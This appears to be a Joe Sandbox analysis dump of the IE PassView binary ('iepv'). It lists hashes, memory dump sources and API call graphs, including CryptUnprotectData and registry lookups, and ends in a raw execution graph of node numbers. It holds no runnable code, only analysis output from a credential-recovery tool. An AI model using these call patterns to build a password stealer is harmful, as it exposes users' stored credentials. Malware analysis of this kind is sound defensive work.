                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FocusMessageSend
                                        • String ID: PP@
                                        • API String ID: 223698058-1603988326
                                        • Opcode ID: a591c2a69ec75bab7d69f01d74449903b34c731458baaccf1f926f7a7a23923f
                                        • Instruction ID: 319bb99eaa8ff1fd24b18a03bdff03010d5574ca49666b8ebf6ce1b114104e8d
                                        • Opcode Fuzzy Hash: a591c2a69ec75bab7d69f01d74449903b34c731458baaccf1f926f7a7a23923f
                                        • Instruction Fuzzy Hash: C26184306403009ACF20AF268885B9A73A4AF44724F15957EF8557F2F3C7BD9D848B9D
                                        APIs
                                          • Part of subcall function 00405CBC: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00406955,00000000,00000000,?,00000020,?,;k@,00406AA3,?,?,;k@), ref: 00405CC9
                                        • _memicmp.MSVCRT ref: 0040689D
                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,;k@,?), ref: 004068B4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FilePointer_memicmpmemcpy
                                        • String ID: URL
                                        • API String ID: 2108176848-3574463123
                                        • Opcode ID: 77e25472ff670075c7f97fcb162713365679f11683cae8fb6ae8cf562b826c1f
                                        • Instruction ID: 665e656d3475a6bf1cfbb61beee9558f5cfe600d303d55f39d77dcf35973ee0d
                                        • Opcode Fuzzy Hash: 77e25472ff670075c7f97fcb162713365679f11683cae8fb6ae8cf562b826c1f
                                        • Instruction Fuzzy Hash: E311E372600208BBEB11DF65CC05F5F7BA8DF41344F114076F905AB291E675DE20CBA8
                                        APIs
                                        • memset.MSVCRT ref: 00408098
                                        • SendMessageA.USER32(00405313,00001019,00000000,?), ref: 004080C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: "
                                        • API String ID: 568519121-123907689
                                        • Opcode ID: 9a7d89582f532bc70890e8afc89be4053827a8b7986d768eab8df2d64cc15a9b
                                        • Instruction ID: e68555285a0c4490628ba0bff90b7032afb0f75e8b8aad83eddb015787144be7
                                        • Opcode Fuzzy Hash: 9a7d89582f532bc70890e8afc89be4053827a8b7986d768eab8df2d64cc15a9b
                                        • Instruction Fuzzy Hash: 99012675800209ABDB209F85CD45AABB7F8FF80748F01843EE894A6280D735AD89CB75
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        • Opcode ID: 5a05c266bdedffb439e2f54ad46894a2b709d4cd4d07083fca0107005192a64c
                                        • Instruction ID: 4e6ba43d21752e254f0c685461c49d150c1a378d92c6c6ef6facbe126f5418e5
                                        • Opcode Fuzzy Hash: 5a05c266bdedffb439e2f54ad46894a2b709d4cd4d07083fca0107005192a64c
                                        • Instruction Fuzzy Hash: 32F01271700204EFEB14EF95D989F9A73A8AF04700F144479F909AB1D1DBB8AA408769
                                        APIs
                                          • Part of subcall function 0040CC6A: RegOpenKeyExA.ADVAPI32(00000104,00000104,00000000,00000104,?,0040CCCC,00406B01,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?,00020019,00000104,?,?,00406B01,?), ref: 0040CC7C
                                          • Part of subcall function 0040CC83: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,-k@,0040CF70,-k@,?,?), ref: 0040CC9C
                                        • RegCloseKey.ADVAPI32(?,?,?,00406B01,?,?,00000104,?), ref: 0040CCEF
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040CCBD
                                        • History, xrefs: 0040CCD3
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: History$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 3677997916-155329520
                                        • Opcode ID: 9a7c009a4a0090f5ae32a9f5cc615a3b887c4cd60392eaddaaaf0a82d0086411
                                        • Instruction ID: 40915cfe07f95d23653045c7b485d250b31a45d2323b856462e04dbed85f8fc2
                                        • Opcode Fuzzy Hash: 9a7c009a4a0090f5ae32a9f5cc615a3b887c4cd60392eaddaaaf0a82d0086411
                                        • Instruction Fuzzy Hash: CEE09271704204FAFB009767DD86E5E7AA9EB88704B140576FD06F01D1F6B59E106519
                                        APIs
                                          • Part of subcall function 00401347: LoadLibraryA.KERNEL32(00000000), ref: 00401362
                                          • Part of subcall function 00401347: GetProcAddress.KERNEL32(00000000,00000000), ref: 00401384
                                          • Part of subcall function 00401347: FreeLibrary.KERNEL32(00000000), ref: 00401394
                                        • _mbscpy.MSVCRT(?,CryptUnprotectData,?,00402616), ref: 004026D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc_mbscpy
                                        • String ID: CryptUnprotectData$s!@
                                        • API String ID: 1197458902-1069634633
                                        • Opcode ID: 8915081f3bdc83493648566d05fa38e6f61e27e7050aa0aaebedd2f7e7695979
                                        • Instruction ID: b43d03ea36532b2251421e96c6422d4be167c69b69b272a6b3e18bd6c711dbf8
                                        • Opcode Fuzzy Hash: 8915081f3bdc83493648566d05fa38e6f61e27e7050aa0aaebedd2f7e7695979
                                        • Instruction Fuzzy Hash: 33E09A316057418ED3259F3EA400146BBE4AFA93007108C7FE0E9E3682E3B8A1888B48
                                        APIs
                                          • Part of subcall function 00407681: GetModuleHandleA.KERNEL32(?,004075F3,00000006,?,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040768B
                                        • LoadMenuA.USER32(00000000), ref: 004077EF
                                        • sprintf.MSVCRT ref: 00407812
                                          • Part of subcall function 00407692: GetMenuItemCount.USER32(?), ref: 004076A8
                                          • Part of subcall function 00407692: memset.MSVCRT ref: 004076CC
                                          • Part of subcall function 00407692: GetMenuItemInfoA.USER32(?), ref: 00407702
                                          • Part of subcall function 00407692: memset.MSVCRT ref: 0040772F
                                          • Part of subcall function 00407692: strchr.MSVCRT ref: 0040773B
                                          • Part of subcall function 00407692: _mbscat.MSVCRT ref: 00407796
                                          • Part of subcall function 00407692: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004077B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountHandleInfoLoadModifyModule_mbscatsprintfstrchr
                                        • String ID: menu_%d
                                        • API String ID: 4172168873-2417748251
                                        • Opcode ID: e08113b4f4dec7348a4a6fc84922e34cdf80e249ac662aab87a7d9f07f746284
                                        • Instruction ID: ed01b0685e68dfe62216100cf5cd09ec08e200f8416e5a7f6d04a15b753ff6f9
                                        • Opcode Fuzzy Hash: e08113b4f4dec7348a4a6fc84922e34cdf80e249ac662aab87a7d9f07f746284
                                        • Instruction Fuzzy Hash: 5BD0C231E4411036DA20772AAD4EF8B2C195BC2765F14467FF100B50D2D7FD50A682AF
                                        APIs
                                          • Part of subcall function 0040576E: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00405786,?,0040251E,?,00000000,00000104), ref: 00405779
                                        • strrchr.MSVCRT ref: 00407F7F
                                        • _mbscat.MSVCRT ref: 00407F94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileModuleName_mbscatstrrchr
                                        • String ID: _lng.ini
                                        • API String ID: 3334749609-1948609170
                                        • Opcode ID: d474001b8c86a43bcc698c6d163b9548e9ae5c4590142ad4a842e8331724842e
                                        • Instruction ID: a1e3aa308b82fc5673dd92debc305a3ebfc9ae380083a4930ba50b3689042e33
                                        • Opcode Fuzzy Hash: d474001b8c86a43bcc698c6d163b9548e9ae5c4590142ad4a842e8331724842e
                                        • Instruction Fuzzy Hash: AFC0801194965014E12632321E03B4F01494F13314F34047BFC00351C7DFFE655540BF
                                        APIs
                                          • Part of subcall function 00405B39: memset.MSVCRT ref: 00405B47
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 0040811E
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 00408145
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 00408166
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,00402879,?,0040B6F7,?,?,?,00000000,0040BA1D), ref: 00408187
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: 76163ed7dae31f195b1dd4358d4c6b7beabcde7d5895f71dd40c0dd104b5668d
                                        • Instruction ID: 975eb5f541548b53aa2b2683ab10cc57e713382b47fe4237ca15f91c7a93a1f7
                                        • Opcode Fuzzy Hash: 76163ed7dae31f195b1dd4358d4c6b7beabcde7d5895f71dd40c0dd104b5668d
                                        • Instruction Fuzzy Hash: 8B21C4B0A017008ED7119F6A8985912FAE4FF90311B2AC8AFD589DF2B2D7B8D805DF15
                                        APIs
                                        • strlen.MSVCRT ref: 00405FA9
                                          • Part of subcall function 00405708: malloc.MSVCRT ref: 00405724
                                          • Part of subcall function 00405708: memcpy.MSVCRT(00000000,00000000,?,00000000,?,0040295B,00000001,?,?,00000000,00401BF3,?), ref: 0040573C
                                          • Part of subcall function 00405708: free.MSVCRT ref: 00405745
                                        • free.MSVCRT ref: 00405FCC
                                        • free.MSVCRT ref: 00405FEF
                                        • memcpy.MSVCRT(00000002,004069FD,000000FF,?,00000001,00000000,?,00406058,00000000,00000000,004069FD), ref: 0040600F
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocstrlen
                                        • String ID:
                                        • API String ID: 3669619086-0
                                        • Opcode ID: d0548e40a4bde75448c6d029b042ce7427e62ca5b2dff442f528b2f56d8fedb0
                                        • Instruction ID: c59032f8cc353ebac638978e1c106deb410c7d9e303b29f677ad7929833933cc
                                        • Opcode Fuzzy Hash: d0548e40a4bde75448c6d029b042ce7427e62ca5b2dff442f528b2f56d8fedb0
                                        • Instruction Fuzzy Hash: F4216D71204A05DFC730EF18D880996B7FAEF44324B108A2EF865ABAD1C739B9198B55
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00008000,0040752E,004027DA,IE PassView), ref: 004074C6
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,0040752E,004027DA,IE PassView), ref: 004074E4
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407502
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040752E,004027DA,IE PassView), ref: 00407512
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: d599127abd47b856bbc0423ba27791b299d38375ce06d93440a2571d77ceda39
                                        • Instruction ID: 5c6c35779c63f8cfc2dd024f26b4d0c78e317132225820d7cc514954e4d0415a
                                        • Opcode Fuzzy Hash: d599127abd47b856bbc0423ba27791b299d38375ce06d93440a2571d77ceda39
                                        • Instruction Fuzzy Hash: B2F062B09512009FE748DB75EE467A53AA0A708304F00C03EA146CB2F1EBF454689F0C

                                        Execution Graph

                                        Execution Coverage:6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0.1%
                                        Total number of Nodes:1302
                                        Total number of Limit Nodes:94
16 API calls 21240->21412 21242 4249df 21402 414b25 16 API calls 21242->21402 21244 424b7d 21413 414b25 16 API calls 21244->21413 21248 424b8e 21414 424187 45 API calls 21248->21414 21249 4249f8 21403 414bbd 16 API calls 21249->21403 21250 42496f 21250->21242 21400 41a9d1 37 API calls 21250->21400 21401 414bbd 16 API calls 21250->21401 21254 424ba9 21415 414b25 16 API calls 21254->21415 21256 424a0a 21404 4281a1 16 API calls 21256->21404 21258 424bbb 21259 424bc3 21258->21259 21260 424bda 21258->21260 21416 414bbd 16 API calls 21259->21416 21417 4281a1 16 API calls 21260->21417 21261 424a36 21405 414bbd 16 API calls 21261->21405 21265 424bd5 21419 414b25 16 API calls 21265->21419 21266->21228 21406 414b25 16 API calls 21266->21406 21407 41b3e5 45 API calls 21266->21407 21267 424be2 21418 414dd5 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId memset 21267->21418 21271 423ec9 21270->21271 21286 423ec2 21270->21286 21271->21286 21432 4230d6 21271->21432 21274 423eea memset 21453 41a804 19 API calls 21274->21453 21276 423f0a 21276->21286 21454 41a804 19 API calls 21276->21454 21278 423f1a 21280 423f79 21278->21280 21278->21286 21455 41a804 19 API calls 21278->21455 21282 423f9f 21280->21282 21457 41a804 19 API calls 21280->21457 21456 40c0cc 19 API calls 21282->21456 21283 423fc9 21283->21286 21458 41a804 19 API calls 21283->21458 21286->21122 21294 423751 21286->21294 21287 423fd5 21287->21286 21288 423ff2 21287->21288 21459 42361e 26 API calls 21287->21459 21288->21286 21460 42361e 26 API calls 21288->21460 21291 42400c 21291->21282 21291->21286 21292 42403f 21291->21292 21292->21286 21293 423eac 138 API calls 21292->21293 21293->21286 21295 423760 21294->21295 21296 423758 21294->21296 21295->21140 21735 414a57 12 API calls 21296->21735 21299 414c2e 21298->21299 21300 414c18 21298->21300 21302 423765 21299->21302 21736 40b3e1 16 API calls 21300->21736 21303 4237c2 21302->21303 21304 42377b 21302->21304 21307 423751 12 API calls 21303->21307 
21327 42386f 21303->21327 21305 423751 12 API calls 21304->21305 21306 42378e 21305->21306 21306->21327 21737 41b3e5 45 API calls 21306->21737 21308 4237eb 21307->21308 21308->21327 21740 41b3e5 45 API calls 21308->21740 21310 4237a4 21738 414ba6 16 API calls 21310->21738 21313 423801 21741 414ba6 16 API calls 21313->21741 21314 4237b3 21739 414bbd 16 API calls 21314->21739 21317 423811 21742 414ba6 16 API calls 21317->21742 21319 42381b 21743 414b25 16 API calls 21319->21743 21321 42382c 21321->21327 21744 414b25 16 API calls 21321->21744 21323 423853 21745 414ba6 16 API calls 21323->21745 21325 42385f 21746 414b25 16 API calls 21325->21746 21327->21144 21329 4275e0 memset 21328->21329 21330 4275c9 21328->21330 21334 42763c 21329->21334 21747 40c0cc 19 API calls 21330->21747 21333 424627 21333->21122 21333->21154 21379 414dd5 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId memset 21333->21379 21748 4264de 16 API calls 21334->21748 21336 427650 21749 40b37e 12 API calls 21336->21749 21338 427667 21339 4276fb 21338->21339 21340 414c03 16 API calls 21338->21340 21355 427714 21339->21355 21752 42641c 15 API calls 21339->21752 21344 42768d 21340->21344 21342 42770f 21753 427570 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21342->21753 21346 4276b7 21344->21346 21750 41b7b2 45 API calls 21344->21750 21346->21339 21751 42694d 23 API calls 21346->21751 21349 4278b1 21755 41dc43 17 API calls 21349->21755 21350 428186 21764 42641c 15 API calls 21350->21764 21353 414c03 16 API calls 21369 427a0b 21353->21369 21355->21349 21754 426ed5 27 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21355->21754 21361 4278e9 21361->21369 21756 41e258 17 API calls 21361->21756 21757 41dcfa 28 API calls 21361->21757 21758 414b25 16 API calls 21361->21758 21759 414bd4 19 API calls 21361->21759 21760 41dc43 17 API calls 21361->21760 21363 42670b 27 API calls 21363->21369 21365 41b7b2 45 API calls 21365->21369 21366 414bbd 16 API calls 
21366->21369 21367 427413 19 API calls 21367->21369 21368 41b3e5 45 API calls 21368->21369 21369->21350 21369->21353 21369->21363 21369->21365 21369->21366 21369->21367 21369->21368 21370 414bd4 19 API calls 21369->21370 21371 414b25 16 API calls 21369->21371 21761 42744b 45 API calls 21369->21761 21762 41b3aa 45 API calls 21369->21762 21763 4274ad 45 API calls 21369->21763 21370->21369 21371->21369 21372->21132 21373->21129 21374->21136 21375->21130 21376->21134 21377->21148 21378->21145 21379->21154 21380->21158 21381->21161 21382->21182 21383->21187 21384->21193 21385->21197 21386->21200 21387->21205 21388->21208 21389->21210 21390->21212 21391->21214 21392->21215 21393->21218 21394->21220 21395->21222 21396->21224 21397->21226 21398->21232 21399->21250 21400->21250 21401->21250 21402->21249 21403->21256 21404->21261 21405->21266 21406->21266 21407->21266 21408->21228 21409->21228 21410->21238 21411->21240 21412->21244 21413->21248 21414->21254 21415->21258 21416->21265 21417->21267 21418->21265 21419->21161 21420->21165 21421->21173 21422->21122 21423->21186 21424->21188 21425->21192 21426->21196 21427->21199 21428->21204 21429->21161 21430->21167 21431->21122 21435 4230f4 21432->21435 21438 42325e 21432->21438 21433 42318b 21473 42227a 23 API calls 21433->21473 21435->21433 21435->21438 21461 41c77c 21435->21461 21471 41d732 139 API calls 21435->21471 21472 419bd5 17 API calls 21435->21472 21437 4234e3 21437->21438 21479 40c0cc 19 API calls 21437->21479 21438->21274 21438->21286 21440 4234dc 21478 419e47 15 API calls 21440->21478 21445 40c0cc 19 API calls 21451 423197 21445->21451 21446 40b168 4 API calls 21446->21451 21447 419512 16 API calls 21447->21451 21448 422119 20 API calls 21448->21451 21449 419cac 21 API calls 21449->21451 21451->21437 21451->21438 21451->21440 21451->21445 21451->21446 21451->21447 21451->21448 21451->21449 21452 4233ff strlen 21451->21452 21474 41cb8f 12 API calls 21451->21474 21475 40be35 21451->21475 21452->21451 21453->21276 
21454->21278 21455->21278 21456->21286 21457->21283 21458->21287 21459->21288 21460->21291 21480 421bae 21461->21480 21466 41c7c4 21489 40c0cc 19 API calls 21466->21489 21467 41c7ad 21488 40c0cc 19 API calls 21467->21488 21470 41c78c 21470->21435 21471->21435 21472->21435 21473->21451 21474->21451 21711 40bdbc 21475->21711 21478->21437 21479->21438 21481 41c788 21480->21481 21482 421bba 21480->21482 21481->21470 21484 41c70f 21481->21484 21490 421b12 21482->21490 21485 41c720 21484->21485 21487 41c775 21484->21487 21486 41c746 strlen 21485->21486 21485->21487 21486->21485 21487->21466 21487->21467 21487->21470 21488->21470 21489->21470 21491 421b94 21490->21491 21493 421b3a 21490->21493 21491->21481 21493->21491 21495 42182f 21493->21495 21529 41c8c3 17 API calls 21493->21529 21530 421733 21495->21530 21498 41c70f strlen 21499 421899 21498->21499 21500 421878 21499->21500 21549 40b358 21499->21549 21500->21493 21505 4218e9 21506 42195e memset 21505->21506 21514 4218ee 21505->21514 21509 42196f 21506->21509 21507 42193d 21507->21509 21507->21514 21516 42199f 21509->21516 21589 41df36 17 API calls 21509->21589 21510 421916 21510->21507 21588 413932 55 API calls 21510->21588 21513 4219af 21590 40b4a0 16 API calls 21513->21590 21587 40b4a0 16 API calls 21514->21587 21516->21513 21520 421a49 21516->21520 21518 421af1 21519 40b168 4 API calls 21518->21519 21519->21500 21521 421a61 21520->21521 21522 40be35 19 API calls 21520->21522 21524 42190e 21521->21524 21591 41c8c3 17 API calls 21521->21591 21523 421a80 21522->21523 21557 4213a0 21523->21557 21592 411369 24 API calls 21524->21592 21528 40b168 4 API calls 21528->21521 21529->21493 21531 421761 21530->21531 21532 421777 21530->21532 21593 4216e7 16 API calls 21531->21593 21532->21531 21534 42178a 21532->21534 21548 42176f 21532->21548 21535 4217ef 21534->21535 21538 421796 atoi 21534->21538 21536 421801 21535->21536 21537 4217f5 21535->21537 21596 41c7e0 strlen 21536->21596 21595 4216e7 16 API calls 21537->21595 21541 
